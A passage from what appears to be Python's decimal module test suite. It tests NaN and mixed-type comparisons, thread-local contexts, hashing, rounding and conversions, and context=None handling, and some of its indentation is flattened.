ctx.traps[InvalidOperation] = 1
for x, y in qnan_pairs:
for op in equality_ops:
got = op(x, y)
expected = True if op is operator.ne else False
self.assertIs(expected, got,
"expected {0!r} for "
"operator.{1}({2!r}, {3!r}); "
"got {4!r}".format(
expected, op.__name__, x, y, got))
for x, y in snan_pairs:
for op in equality_ops:
self.assertRaises(InvalidOperation, operator.eq, x, y)
self.assertRaises(InvalidOperation, operator.ne, x, y)
for x, y in qnan_pairs + snan_pairs:
for op in order_ops:
self.assertRaises(InvalidOperation, op, x, y)
def test_copy_sign(self):
Decimal = self.decimal.Decimal
d = Decimal(1).copy_sign(Decimal(-2))
self.assertEqual(Decimal(1).copy_sign(-2), d)
self.assertRaises(TypeError, Decimal(1).copy_sign, '-2')
class CArithmeticOperatorsTest(ArithmeticOperatorsTest):
    # Run the shared arithmetic-operator cases against the C implementation.
    decimal = C
class PyArithmeticOperatorsTest(ArithmeticOperatorsTest):
    # Run the shared arithmetic-operator cases against the pure-Python
    # implementation.
    decimal = P
# The following two functions run in worker threads; they are used by the
# ThreadingTest class below to exercise thread-local contexts.
def thfunc1(cls):
    """First worker for ThreadingTest.test_threading.

    Runs in its own thread; ``cls`` is the ThreadingTest instance, used
    both for its assert* methods and for the shared Event objects
    (``synchro``, ``finish1``).  Verifies that this thread's context
    (derived from DefaultContext, prec=24) is isolated from the precision
    change thfunc2 makes to *its* thread context.
    """
    Decimal = cls.decimal.Decimal
    InvalidOperation = cls.decimal.InvalidOperation
    DivisionByZero = cls.decimal.DivisionByZero
    Overflow = cls.decimal.Overflow
    Underflow = cls.decimal.Underflow
    Inexact = cls.decimal.Inexact
    getcontext = cls.decimal.getcontext
    localcontext = cls.decimal.localcontext

    d1 = Decimal(1)
    d3 = Decimal(3)
    test1 = d1/d3

    # Tell the driver we've done the first division, then block until
    # thfunc2 has changed its own thread context to prec=18.
    cls.finish1.set()
    cls.synchro.wait()

    # Must still round to this thread's 24 digits, not thfunc2's 18.
    test2 = d1/d3
    with localcontext() as c2:
        # localcontext() copies the current context, flags included.
        cls.assertTrue(c2.flags[Inexact])
        cls.assertRaises(DivisionByZero, c2.divide, d1, 0)
        cls.assertTrue(c2.flags[DivisionByZero])
        with localcontext() as c3:
            cls.assertTrue(c3.flags[Inexact])
            cls.assertTrue(c3.flags[DivisionByZero])
            cls.assertRaises(InvalidOperation, c3.compare, d1, Decimal('sNaN'))
            cls.assertTrue(c3.flags[InvalidOperation])
            del c3
        # Flags set in the inner context must not leak back out.
        cls.assertFalse(c2.flags[InvalidOperation])
        del c2

    cls.assertEqual(test1, Decimal('0.333333333333333333333333'))
    cls.assertEqual(test2, Decimal('0.333333333333333333333333'))

    # The thread context carries Inexact from the divisions, nothing else.
    c1 = getcontext()
    cls.assertTrue(c1.flags[Inexact])
    for sig in Overflow, Underflow, DivisionByZero, InvalidOperation:
        cls.assertFalse(c1.flags[sig])
def thfunc2(cls):
    """Second worker for ThreadingTest.test_threading.

    Changes its own thread context (prec=18) and then releases thfunc1 via
    the ``synchro`` event, so thfunc1 can verify the change did not leak
    across threads.  Also checks flag/trap propagation through nested
    localcontext() blocks.
    """
    Decimal = cls.decimal.Decimal
    InvalidOperation = cls.decimal.InvalidOperation
    DivisionByZero = cls.decimal.DivisionByZero
    Overflow = cls.decimal.Overflow
    Underflow = cls.decimal.Underflow
    Inexact = cls.decimal.Inexact
    getcontext = cls.decimal.getcontext
    localcontext = cls.decimal.localcontext

    d1 = Decimal(1)
    d3 = Decimal(3)
    test1 = d1/d3

    # Change only this thread's context.
    thiscontext = getcontext()
    thiscontext.prec = 18
    test2 = d1/d3

    with localcontext() as c2:
        cls.assertTrue(c2.flags[Inexact])
        cls.assertRaises(Overflow, c2.multiply, Decimal('1e425000000'), 999)
        cls.assertTrue(c2.flags[Overflow])
        # An explicit context argument is copied, flags included.
        with localcontext(thiscontext) as c3:
            cls.assertTrue(c3.flags[Inexact])
            cls.assertFalse(c3.flags[Overflow])
            c3.traps[Underflow] = True
            cls.assertRaises(Underflow, c3.divide, Decimal('1e-425000000'), 999)
            cls.assertTrue(c3.flags[Underflow])
            del c3
        # Neither the flag nor the trap set on c3 leaks back to c2.
        cls.assertFalse(c2.flags[Underflow])
        cls.assertFalse(c2.traps[Underflow])
        del c2

    # Release thfunc1 (it waits on synchro) and signal completion.
    cls.synchro.set()
    cls.finish2.set()

    # test1 was computed at the default 24 digits, test2 at 18.
    cls.assertEqual(test1, Decimal('0.333333333333333333333333'))
    cls.assertEqual(test2, Decimal('0.333333333333333333'))

    cls.assertFalse(thiscontext.traps[Underflow])
    cls.assertTrue(thiscontext.flags[Inexact])
    for sig in Overflow, Underflow, DivisionByZero, InvalidOperation:
        cls.assertFalse(thiscontext.flags[sig])
class ThreadingTest(unittest.TestCase):
    '''Unit tests for thread local contexts in Decimal.'''

    # Take care executing this test from IDLE, there's an issue in threading
    # that hangs IDLE and I couldn't find it

    def test_threading(self):
        DefaultContext = self.decimal.DefaultContext

        if self.decimal == C and not self.decimal.HAVE_THREADS:
            self.skipTest("compiled without threading")
        # Test the "threading isolation" of a Context. Also test changing
        # the DefaultContext, which acts as a template for the thread-local
        # contexts.
        save_prec = DefaultContext.prec
        save_emax = DefaultContext.Emax
        save_emin = DefaultContext.Emin
        DefaultContext.prec = 24
        DefaultContext.Emax = 425000000
        DefaultContext.Emin = -425000000

        # Events shared with the two workers: finish1/finish2 signal
        # completion back to us; synchro is thfunc2 releasing thfunc1.
        self.synchro = threading.Event()
        self.finish1 = threading.Event()
        self.finish2 = threading.Event()

        th1 = threading.Thread(target=thfunc1, args=(self,))
        th2 = threading.Thread(target=thfunc2, args=(self,))

        th1.start()
        th2.start()

        self.finish1.wait()
        self.finish2.wait()

        # The workers touch only their thread-local contexts; the template
        # DefaultContext must end with no flags set.  (Signals is a
        # module-level mapping from implementation to its signal classes,
        # defined elsewhere in this file.)
        for sig in Signals[self.decimal]:
            self.assertFalse(DefaultContext.flags[sig])

        th1.join()
        th2.join()

        # Restore the shared template for subsequent tests.
        DefaultContext.prec = save_prec
        DefaultContext.Emax = save_emax
        DefaultContext.Emin = save_emin
class CThreadingTest(ThreadingTest):
    # Run the threading-isolation test against the C implementation.
    decimal = C
class PyThreadingTest(ThreadingTest):
    # Run the threading-isolation test against the pure-Python implementation.
    decimal = P
class UsabilityTest(unittest.TestCase):
'''Unit tests for Usability cases of Decimal.'''
def test_comparison_operators(self):
Decimal = self.decimal.Decimal
da = Decimal('23.42')
db = Decimal('23.42')
dc = Decimal('45')
#two Decimals
self.assertGreater(dc, da)
self.assertGreaterEqual(dc, da)
self.assertLess(da, dc)
self.assertLessEqual(da, dc)
self.assertEqual(da, db)
self.assertNotEqual(da, dc)
self.assertLessEqual(da, db)
self.assertGreaterEqual(da, db)
#a Decimal and an int
self.assertGreater(dc, 23)
self.assertLess(23, dc)
self.assertEqual(dc, 45)
#a Decimal and uncomparable
self.assertNotEqual(da, 'ugly')
self.assertNotEqual(da, 32.7)
self.assertNotEqual(da, object())
self.assertNotEqual(da, object)
# sortable
a = list(map(Decimal, range(100)))
b = a[:]
random.shuffle(a)
a.sort()
self.assertEqual(a, b)
def test_decimal_float_comparison(self):
Decimal = self.decimal.Decimal
da = Decimal('0.25')
db = Decimal('3.0')
self.assertLess(da, 3.0)
self.assertLessEqual(da, 3.0)
self.assertGreater(db, 0.25)
self.assertGreaterEqual(db, 0.25)
self.assertNotEqual(da, 1.5)
self.assertEqual(da, 0.25)
self.assertGreater(3.0, da)
self.assertGreaterEqual(3.0, da)
self.assertLess(0.25, db)
self.assertLessEqual(0.25, db)
self.assertNotEqual(0.25, db)
self.assertEqual(3.0, db)
self.assertNotEqual(0.1, Decimal('0.1'))
def test_decimal_complex_comparison(self):
Decimal = self.decimal.Decimal
da = Decimal('0.25')
db = Decimal('3.0')
self.assertNotEqual(da, (1.5+0j))
self.assertNotEqual((1.5+0j), da)
self.assertEqual(da, (0.25+0j))
self.assertEqual((0.25+0j), da)
self.assertEqual((3.0+0j), db)
self.assertEqual(db, (3.0+0j))
self.assertNotEqual(db, (3.0+1j))
self.assertNotEqual((3.0+1j), db)
self.assertIs(db.__lt__(3.0+0j), NotImplemented)
self.assertIs(db.__le__(3.0+0j), NotImplemented)
self.assertIs(db.__gt__(3.0+0j), NotImplemented)
self.assertIs(db.__le__(3.0+0j), NotImplemented)
    def test_decimal_fraction_comparison(self):
        # Mixed Decimal/Fraction comparisons must be exact.
        # NOTE(review): ``fractions`` here is a module-level mapping from
        # implementation module to its Fraction class, and ``C`` is the C
        # decimal module (or None if unavailable) -- both defined elsewhere
        # in this file.
        D = self.decimal.Decimal
        F = fractions[self.decimal].Fraction
        Context = self.decimal.Context
        localcontext = self.decimal.localcontext
        InvalidOperation = self.decimal.InvalidOperation

        # use the widest exponent range the implementation supports
        emax = C.MAX_EMAX if C else 999999999
        emin = C.MIN_EMIN if C else -999999999
        etiny = C.MIN_ETINY if C else -1999999997
        c = Context(Emax=emax, Emin=emin)

        with localcontext(c):
            c.prec = emax
            self.assertLess(D(0), F(1,9999999999999999999999999999999999999))
            self.assertLess(F(-1,9999999999999999999999999999999999999), D(0))
            self.assertLess(F(0,1), D("1e" + str(etiny)))
            self.assertLess(D("-1e" + str(etiny)), F(0,1))
            self.assertLess(F(0,9999999999999999999999999), D("1e" + str(etiny)))
            self.assertLess(D("-1e" + str(etiny)), F(0,9999999999999999999999999))

            self.assertEqual(D("0.1"), F(1,10))
            self.assertEqual(F(1,10), D("0.1"))

            # at finite precision 1/3 is rounded, so it differs from F(1,3)
            c.prec = 300
            self.assertNotEqual(D(1)/3, F(1,3))
            self.assertNotEqual(F(1,3), D(1)/3)

            self.assertLessEqual(F(120984237, 9999999999), D("9e" + str(emax)))
            self.assertGreaterEqual(D("9e" + str(emax)), F(120984237, 9999999999))

            self.assertGreater(D('inf'), F(99999999999,123))
            self.assertGreater(D('inf'), F(-99999999999,123))
            self.assertLess(D('-inf'), F(99999999999,123))
            self.assertLess(D('-inf'), F(-99999999999,123))

            # order comparisons with NaN signal; equality just returns unequal
            self.assertRaises(InvalidOperation, D('nan').__gt__, F(-9,123))
            self.assertIs(NotImplemented, F(-9,123).__lt__(D('nan')))
            self.assertNotEqual(D('nan'), F(-9,123))
            self.assertNotEqual(F(-9,123), D('nan'))
def test_copy_and_deepcopy_methods(self):
Decimal = self.decimal.Decimal
d = Decimal('43.24')
c = copy.copy(d)
self.assertEqual(id(c), id(d))
dc = copy.deepcopy(d)
self.assertEqual(id(dc), id(d))
    def test_hash_method(self):
        # hash(d) must agree with d.__hash__(), with hash(int(d)) for
        # integral values and with hash(float) for exactly-representable
        # values; signaling NaNs are unhashable; the hash must not depend
        # on the current context.

        Decimal = self.decimal.Decimal
        localcontext = self.decimal.localcontext

        def hashit(d):
            # sanity check: hash() and __hash__() agree
            a = hash(d)
            b = d.__hash__()
            self.assertEqual(a, b)
            return a

        #just that it's hashable
        hashit(Decimal(23))
        hashit(Decimal('Infinity'))
        hashit(Decimal('-Infinity'))
        hashit(Decimal('nan123'))
        hashit(Decimal('-NaN'))

        # integers around power-of-two boundaries (hash regression values)
        test_values = [Decimal(sign*(2**m + n))
                       for m in [0, 14, 15, 16, 17, 30, 31,
                                 32, 33, 61, 62, 63, 64, 65, 66]
                       for n in range(-10, 10)
                       for sign in [-1, 1]]
        test_values.extend([
                Decimal("-1"), # ==> -2
                Decimal("-0"), # zeros
                Decimal("0.00"),
                Decimal("-0.000"),
                Decimal("0E10"),
                Decimal("-0E12"),
                Decimal("10.0"), # negative exponent
                Decimal("-23.00000"),
                Decimal("1230E100"), # positive exponent
                Decimal("-4.5678E50"),
                # a value for which hash(n) != hash(n % (2**64-1))
                # in Python pre-2.6
                Decimal(2**64 + 2**32 - 1),
                # selection of values which fail with the old (before
                # version 2.6) long.__hash__
                Decimal("1.634E100"),
                Decimal("90.697E100"),
                Decimal("188.83E100"),
                Decimal("1652.9E100"),
                Decimal("56531E100"),
                ])

        # check that hash(d) == hash(int(d)) for integral values
        for value in test_values:
            self.assertEqual(hashit(value), hashit(int(value)))

        #the same hash that to an int
        self.assertEqual(hashit(Decimal(23)), hashit(23))
        self.assertRaises(TypeError, hash, Decimal('sNaN'))
        self.assertTrue(hashit(Decimal('Inf')))
        self.assertTrue(hashit(Decimal('-Inf')))

        # check that the hashes of a Decimal float match when they
        # represent exactly the same values
        test_strings = ['inf', '-Inf', '0.0', '-.0e1',
                        '34.0', '2.5', '112390.625', '-0.515625']
        for s in test_strings:
            f = float(s)
            d = Decimal(s)
            self.assertEqual(hashit(f), hashit(d))

        with localcontext() as c:
            # check that the value of the hash doesn't depend on the
            # current context (issue #1757)
            x = Decimal("123456789.1")

            c.prec = 6
            h1 = hashit(x)
            c.prec = 10
            h2 = hashit(x)
            c.prec = 16
            h3 = hashit(x)

            self.assertEqual(h1, h2)
            self.assertEqual(h1, h3)

            c.prec = 10000
            x = 1100 ** 1248
            self.assertEqual(hashit(Decimal(x)), hashit(x))
def test_min_and_max_methods(self):
Decimal = self.decimal.Decimal
d1 = Decimal('15.32')
d2 = Decimal('28.5')
l1 = 15
l2 = 28
#between Decimals
self.assertIs(min(d1,d2), d1)
self.assertIs(min(d2,d1), d1)
self.assertIs(max(d1,d2), d2)
self.assertIs(max(d2,d1), d2)
#between Decimal and int
self.assertIs(min(d1,l2), d1)
self.assertIs(min(l2,d1), d1)
self.assertIs(max(l1,d2), d2)
self.assertIs(max(d2,l1), d2)
def test_as_nonzero(self):
Decimal = self.decimal.Decimal
#as false
self.assertFalse(Decimal(0))
#as true
self.assertTrue(Decimal('0.372'))
def test_tostring_methods(self):
#Test str and repr methods.
Decimal = self.decimal.Decimal
d = Decimal('15.32')
self.assertEqual(str(d), '15.32') # str
self.assertEqual(repr(d), "Decimal('15.32')") # repr
    def test_tonum_methods(self):
        #Test int/float conversion plus math.floor, math.ceil and round().
        Decimal = self.decimal.Decimal

        d1 = Decimal('66')
        d2 = Decimal('15.32')

        #int (truncates toward zero)
        self.assertEqual(int(d1), 66)
        self.assertEqual(int(d2), 15)

        #float
        self.assertEqual(float(d1), 66)
        self.assertEqual(float(d2), 15.32)

        #floor
        test_pairs = [
            ('123.00', 123),
            ('3.2', 3),
            ('3.54', 3),
            ('3.899', 3),
            ('-2.3', -3),
            ('-11.0', -11),
            ('0.0', 0),
            ('-0E3', 0),
            ('89891211712379812736.1', 89891211712379812736),
            ]
        for d, i in test_pairs:
            self.assertEqual(math.floor(Decimal(d)), i)
        # NaNs and infinities are not floorable
        self.assertRaises(ValueError, math.floor, Decimal('-NaN'))
        self.assertRaises(ValueError, math.floor, Decimal('sNaN'))
        self.assertRaises(ValueError, math.floor, Decimal('NaN123'))
        self.assertRaises(OverflowError, math.floor, Decimal('Inf'))
        self.assertRaises(OverflowError, math.floor, Decimal('-Inf'))

        #ceiling
        test_pairs = [
            ('123.00', 123),
            ('3.2', 4),
            ('3.54', 4),
            ('3.899', 4),
            ('-2.3', -2),
            ('-11.0', -11),
            ('0.0', 0),
            ('-0E3', 0),
            ('89891211712379812736.1', 89891211712379812737),
            ]
        for d, i in test_pairs:
            self.assertEqual(math.ceil(Decimal(d)), i)
        self.assertRaises(ValueError, math.ceil, Decimal('-NaN'))
        self.assertRaises(ValueError, math.ceil, Decimal('sNaN'))
        self.assertRaises(ValueError, math.ceil, Decimal('NaN123'))
        self.assertRaises(OverflowError, math.ceil, Decimal('Inf'))
        self.assertRaises(OverflowError, math.ceil, Decimal('-Inf'))

        #round, single argument (banker's rounding on the .5 cases)
        test_pairs = [
            ('123.00', 123),
            ('3.2', 3),
            ('3.54', 4),
            ('3.899', 4),
            ('-2.3', -2),
            ('-11.0', -11),
            ('0.0', 0),
            ('-0E3', 0),
            ('-3.5', -4),
            ('-2.5', -2),
            ('-1.5', -2),
            ('-0.5', 0),
            ('0.5', 0),
            ('1.5', 2),
            ('2.5', 2),
            ('3.5', 4),
            ]
        for d, i in test_pairs:
            self.assertEqual(round(Decimal(d)), i)
        self.assertRaises(ValueError, round, Decimal('-NaN'))
        self.assertRaises(ValueError, round, Decimal('sNaN'))
        self.assertRaises(ValueError, round, Decimal('NaN123'))
        self.assertRaises(OverflowError, round, Decimal('Inf'))
        self.assertRaises(OverflowError, round, Decimal('-Inf'))

        #round, two arguments; this is essentially equivalent
        #to quantize, which is already extensively tested
        test_triples = [
            ('123.456', -4, '0E+4'),
            ('123.456', -3, '0E+3'),
            ('123.456', -2, '1E+2'),
            ('123.456', -1, '1.2E+2'),
            ('123.456', 0, '123'),
            ('123.456', 1, '123.5'),
            ('123.456', 2, '123.46'),
            ('123.456', 3, '123.456'),
            ('123.456', 4, '123.4560'),
            ('123.455', 2, '123.46'),
            ('123.445', 2, '123.44'),
            ('Inf', 4, 'NaN'),
            ('-Inf', -23, 'NaN'),
            ('sNaN314', 3, 'NaN314'),
            ]
        for d, n, r in test_triples:
            self.assertEqual(str(round(Decimal(d), n)), r)
def test_nan_to_float(self):
# Test conversions of decimal NANs to float.
# See http://bugs.python.org/issue15544
Decimal = self.decimal.Decimal
for s in ('nan', 'nan1234', '-nan', '-nan2468'):
f = float(Decimal(s))
self.assertTrue(math.isnan(f))
sign = math.copysign(1.0, f)
self.assertEqual(sign, -1.0 if s.startswith('-') else 1.0)
def test_snan_to_float(self):
Decimal = self.decimal.Decimal
for s in ('snan', '-snan', 'snan1357', '-snan1234'):
d = Decimal(s)
self.assertRaises(ValueError, float, d)
def test_eval_round_trip(self):
Decimal = self.decimal.Decimal
#with zero
d = Decimal( (0, (0,), 0) )
self.assertEqual(d, eval(repr(d)))
#int
d = Decimal( (1, (4, 5), 0) )
self.assertEqual(d, eval(repr(d)))
#float
d = Decimal( (0, (4, 5, 3, 4), -2) )
self.assertEqual(d, eval(repr(d)))
#weird
d = Decimal( (1, (4, 3, 4, 9, 1, 3, 5, 3, 4), -25) )
self.assertEqual(d, eval(repr(d)))
    def test_as_tuple(self):
        # as_tuple() returns (sign, digit-tuple, exponent); leading zeros
        # in coefficients and NaN payloads are stripped.
        Decimal = self.decimal.Decimal

        #with zero
        d = Decimal(0)
        self.assertEqual(d.as_tuple(), (0, (0,), 0) )

        #int
        d = Decimal(-45)
        self.assertEqual(d.as_tuple(), (1, (4, 5), 0) )

        #complicated string
        d = Decimal("-4.34913534E-17")
        self.assertEqual(d.as_tuple(), (1, (4, 3, 4, 9, 1, 3, 5, 3, 4), -25) )

        # The '0' coefficient is implementation specific to decimal.py.
        # It has no meaning in the C-version and is ignored there.
        d = Decimal("Infinity")
        self.assertEqual(d.as_tuple(), (0, (0,), 'F') )

        #leading zeros in coefficient should be stripped
        d = Decimal( (0, (0, 0, 4, 0, 5, 3, 4), -2) )
        self.assertEqual(d.as_tuple(), (0, (4, 0, 5, 3, 4), -2) )
        d = Decimal( (1, (0, 0, 0), 37) )
        self.assertEqual(d.as_tuple(), (1, (0,), 37))
        d = Decimal( (1, (), 37) )
        self.assertEqual(d.as_tuple(), (1, (0,), 37))

        #leading zeros in NaN diagnostic info should be stripped
        d = Decimal( (0, (0, 0, 4, 0, 5, 3, 4), 'n') )
        self.assertEqual(d.as_tuple(), (0, (4, 0, 5, 3, 4), 'n') )
        d = Decimal( (1, (0, 0, 0), 'N') )
        self.assertEqual(d.as_tuple(), (1, (), 'N') )
        d = Decimal( (1, (), 'n') )
        self.assertEqual(d.as_tuple(), (1, (), 'n') )

        # For infinities, decimal.py has always silently accepted any
        # coefficient tuple.
        d = Decimal( (0, (0,), 'F') )
        self.assertEqual(d.as_tuple(), (0, (0,), 'F'))
        d = Decimal( (0, (4, 5, 3, 4), 'F') )
        self.assertEqual(d.as_tuple(), (0, (0,), 'F'))
        d = Decimal( (1, (0, 2, 7, 1), 'F') )
        self.assertEqual(d.as_tuple(), (1, (0,), 'F'))
def test_as_integer_ratio(self):
Decimal = self.decimal.Decimal
# exceptional cases
self.assertRaises(OverflowError,
Decimal.as_integer_ratio, Decimal('inf'))
self.assertRaises(OverflowError,
Decimal.as_integer_ratio, Decimal('-inf'))
self.assertRaises(ValueError,
Decimal.as_integer_ratio, Decimal('-nan'))
self.assertRaises(ValueError,
Decimal.as_integer_ratio, Decimal('snan123'))
for exp in range(-4, 2):
for coeff in range(1000):
for sign in '+', '-':
d = Decimal('%s%dE%d' % (sign, coeff, exp))
pq = d.as_integer_ratio()
p, q = pq
# check return type
self.assertIsInstance(pq, tuple)
self.assertIsInstance(p, int)
self.assertIsInstance(q, int)
# check normalization: q should be positive;
# p should be relatively prime to q.
self.assertGreater(q, 0)
self.assertEqual(math.gcd(p, q), 1)
# check that p/q actually gives the correct value
self.assertEqual(Decimal(p) / Decimal(q), d)
    def test_subclassing(self):
        # Different behaviours when subclassing Decimal: arithmetic and
        # named methods return plain Decimal, while copy/deepcopy and the
        # subclass constructor preserve the subclass (but never the extra
        # instance state).
        Decimal = self.decimal.Decimal

        class MyDecimal(Decimal):
            y = None

        d1 = MyDecimal(1)
        d2 = MyDecimal(2)
        # operators and methods downcast to Decimal
        d = d1 + d2
        self.assertIs(type(d), Decimal)

        d = d1.max(d2)
        self.assertIs(type(d), Decimal)

        # copy/deepcopy keep the subclass
        d = copy.copy(d1)
        self.assertIs(type(d), MyDecimal)
        self.assertEqual(d, d1)

        d = copy.deepcopy(d1)
        self.assertIs(type(d), MyDecimal)
        self.assertEqual(d, d1)

        # Decimal(Decimal)
        d = Decimal('1.0')
        x = Decimal(d)
        self.assertIs(type(x), Decimal)
        self.assertEqual(x, d)

        # MyDecimal(Decimal)
        m = MyDecimal(d)
        self.assertIs(type(m), MyDecimal)
        self.assertEqual(m, d)
        self.assertIs(m.y, None)

        # Decimal(MyDecimal)
        x = Decimal(m)
        self.assertIs(type(x), Decimal)
        self.assertEqual(x, d)

        # MyDecimal(MyDecimal): value is copied, extra attribute is not
        m.y = 9
        x = MyDecimal(m)
        self.assertIs(type(x), MyDecimal)
        self.assertEqual(x, d)
        self.assertIs(x.y, None)
def test_implicit_context(self):
Decimal = self.decimal.Decimal
getcontext = self.decimal.getcontext
# Check results when context given implicitly. (Issue 2478)
c = getcontext()
self.assertEqual(str(Decimal(0).sqrt()),
str(c.sqrt(Decimal(0))))
    def test_none_args(self):
        # Passing context=None (and rounding=None) explicitly must behave
        # exactly like omitting the argument: the current thread context
        # and its rounding mode are used.
        Decimal = self.decimal.Decimal
        Context = self.decimal.Context
        localcontext = self.decimal.localcontext
        InvalidOperation = self.decimal.InvalidOperation
        DivisionByZero = self.decimal.DivisionByZero
        Overflow = self.decimal.Overflow
        Underflow = self.decimal.Underflow
        Subnormal = self.decimal.Subnormal
        Inexact = self.decimal.Inexact
        Rounded = self.decimal.Rounded
        Clamped = self.decimal.Clamped

        with localcontext(Context()) as c:
            c.prec = 7
            c.Emax = 999
            c.Emin = -999

            x = Decimal("111")
            y = Decimal("1e9999")
            z = Decimal("1e-9999")

            ##### Unary functions
            c.clear_flags()
            self.assertEqual(str(x.exp(context=None)), '1.609487E+48')
            self.assertTrue(c.flags[Inexact])
            self.assertTrue(c.flags[Rounded])
            c.clear_flags()
            self.assertRaises(Overflow, y.exp, context=None)
            self.assertTrue(c.flags[Overflow])

            self.assertIs(z.is_normal(context=None), False)
            self.assertIs(z.is_subnormal(context=None), True)

            c.clear_flags()
            self.assertEqual(str(x.ln(context=None)), '4.709530')
            self.assertTrue(c.flags[Inexact])
            self.assertTrue(c.flags[Rounded])
            c.clear_flags()
            self.assertRaises(InvalidOperation, Decimal(-1).ln, context=None)
            self.assertTrue(c.flags[InvalidOperation])

            c.clear_flags()
            self.assertEqual(str(x.log10(context=None)), '2.045323')
            self.assertTrue(c.flags[Inexact])
            self.assertTrue(c.flags[Rounded])
            c.clear_flags()
            self.assertRaises(InvalidOperation, Decimal(-1).log10, context=None)
            self.assertTrue(c.flags[InvalidOperation])

            c.clear_flags()
            self.assertEqual(str(x.logb(context=None)), '2')
            self.assertRaises(DivisionByZero, Decimal(0).logb, context=None)
            self.assertTrue(c.flags[DivisionByZero])

            c.clear_flags()
            self.assertEqual(str(x.logical_invert(context=None)), '1111000')
            self.assertRaises(InvalidOperation, y.logical_invert, context=None)
            self.assertTrue(c.flags[InvalidOperation])

            c.clear_flags()
            self.assertEqual(str(y.next_minus(context=None)), '9.999999E+999')
            self.assertRaises(InvalidOperation, Decimal('sNaN').next_minus, context=None)
            self.assertTrue(c.flags[InvalidOperation])

            c.clear_flags()
            self.assertEqual(str(y.next_plus(context=None)), 'Infinity')
            self.assertRaises(InvalidOperation, Decimal('sNaN').next_plus, context=None)
            self.assertTrue(c.flags[InvalidOperation])

            c.clear_flags()
            self.assertEqual(str(z.normalize(context=None)), '0')
            self.assertRaises(Overflow, y.normalize, context=None)
            self.assertTrue(c.flags[Overflow])

            self.assertEqual(str(z.number_class(context=None)), '+Subnormal')

            c.clear_flags()
            self.assertEqual(str(z.sqrt(context=None)), '0E-1005')
            self.assertTrue(c.flags[Clamped])
            self.assertTrue(c.flags[Inexact])
            self.assertTrue(c.flags[Rounded])
            self.assertTrue(c.flags[Subnormal])
            self.assertTrue(c.flags[Underflow])
            c.clear_flags()
            self.assertRaises(Overflow, y.sqrt, context=None)
            self.assertTrue(c.flags[Overflow])

            # to_eng_string honours the context's capitals setting
            c.capitals = 0
            self.assertEqual(str(z.to_eng_string(context=None)), '1e-9999')
            c.capitals = 1

            ##### Binary functions
            c.clear_flags()
            ans = str(x.compare(Decimal('Nan891287828'), context=None))
            self.assertEqual(ans, 'NaN1287828')
            self.assertRaises(InvalidOperation, x.compare, Decimal('sNaN'), context=None)
            self.assertTrue(c.flags[InvalidOperation])

            c.clear_flags()
            ans = str(x.compare_signal(8224, context=None))
            self.assertEqual(ans, '-1')
            self.assertRaises(InvalidOperation, x.compare_signal, Decimal('NaN'), context=None)
            self.assertTrue(c.flags[InvalidOperation])

            c.clear_flags()
            ans = str(x.logical_and(101, context=None))
            self.assertEqual(ans, '101')
            self.assertRaises(InvalidOperation, x.logical_and, 123, context=None)
            self.assertTrue(c.flags[InvalidOperation])

            c.clear_flags()
            ans = str(x.logical_or(101, context=None))
            self.assertEqual(ans, '111')
            self.assertRaises(InvalidOperation, x.logical_or, 123, context=None)
            self.assertTrue(c.flags[InvalidOperation])

            c.clear_flags()
            ans = str(x.logical_xor(101, context=None))
            self.assertEqual(ans, '10')
            self.assertRaises(InvalidOperation, x.logical_xor, 123, context=None)
            self.assertTrue(c.flags[InvalidOperation])

            c.clear_flags()
            ans = str(x.max(101, context=None))
            self.assertEqual(ans, '111')
            self.assertRaises(InvalidOperation, x.max, Decimal('sNaN'), context=None)
            self.assertTrue(c.flags[InvalidOperation])

            c.clear_flags()
            ans = str(x.max_mag(101, context=None))
            self.assertEqual(ans, '111')
            self.assertRaises(InvalidOperation, x.max_mag, Decimal('sNaN'), context=None)
            self.assertTrue(c.flags[InvalidOperation])

            c.clear_flags()
            ans = str(x.min(101, context=None))
            self.assertEqual(ans, '101')
            self.assertRaises(InvalidOperation, x.min, Decimal('sNaN'), context=None)
            self.assertTrue(c.flags[InvalidOperation])

            c.clear_flags()
            ans = str(x.min_mag(101, context=None))
            self.assertEqual(ans, '101')
            self.assertRaises(InvalidOperation, x.min_mag, Decimal('sNaN'), context=None)
            self.assertTrue(c.flags[InvalidOperation])

            c.clear_flags()
            ans = str(x.remainder_near(101, context=None))
            self.assertEqual(ans, '10')
            self.assertRaises(InvalidOperation, y.remainder_near, 101, context=None)
            self.assertTrue(c.flags[InvalidOperation])

            c.clear_flags()
            ans = str(x.rotate(2, context=None))
            self.assertEqual(ans, '11100')
            self.assertRaises(InvalidOperation, x.rotate, 101, context=None)
            self.assertTrue(c.flags[InvalidOperation])

            c.clear_flags()
            ans = str(x.scaleb(7, context=None))
            self.assertEqual(ans, '1.11E+9')
            self.assertRaises(InvalidOperation, x.scaleb, 10000, context=None)
            self.assertTrue(c.flags[InvalidOperation])

            c.clear_flags()
            ans = str(x.shift(2, context=None))
            self.assertEqual(ans, '11100')
            self.assertRaises(InvalidOperation, x.shift, 10000, context=None)
            self.assertTrue(c.flags[InvalidOperation])

            ##### Ternary functions
            c.clear_flags()
            ans = str(x.fma(2, 3, context=None))
            self.assertEqual(ans, '225')
            self.assertRaises(Overflow, x.fma, Decimal('1e9999'), 3, context=None)
            self.assertTrue(c.flags[Overflow])

            ##### Special cases
            # rounding=None must track the context's current rounding mode
            c.rounding = ROUND_HALF_EVEN
            ans = str(Decimal('1.5').to_integral(rounding=None, context=None))
            self.assertEqual(ans, '2')
            c.rounding = ROUND_DOWN
            ans = str(Decimal('1.5').to_integral(rounding=None, context=None))
            self.assertEqual(ans, '1')
            ans = str(Decimal('1.5').to_integral(rounding=ROUND_UP, context=None))
            self.assertEqual(ans, '2')
            c.clear_flags()
            self.assertRaises(InvalidOperation, Decimal('sNaN').to_integral, context=None)
            self.assertTrue(c.flags[InvalidOperation])

            c.rounding = ROUND_HALF_EVEN
            ans = str(Decimal('1.5').to_integral_value(rounding=None, context=None))
            self.assertEqual(ans, '2')
            c.rounding = ROUND_DOWN
            ans = str(Decimal('1.5').to_integral_value(rounding=None, context=None))
            self.assertEqual(ans, '1')
            ans = str(Decimal('1.5').to_integral_value(rounding=ROUND_UP, context=None))
            self.assertEqual(ans, '2')
            c.clear_flags()
            self.assertRaises(InvalidOperation, Decimal('sNaN').to_integral_value, context=None)
            self.assertTrue(c.flags[InvalidOperation])

            c.rounding = ROUND_HALF_EVEN
            ans = str(Decimal('1.5').to_integral_exact(rounding=None, context=None))
            self.assertEqual(ans, '2')
            c.rounding = ROUND_DOWN
            ans = str(Decimal('1.5').to_integral_exact(rounding=None, context=None))
            self.assertEqual(ans, '1')
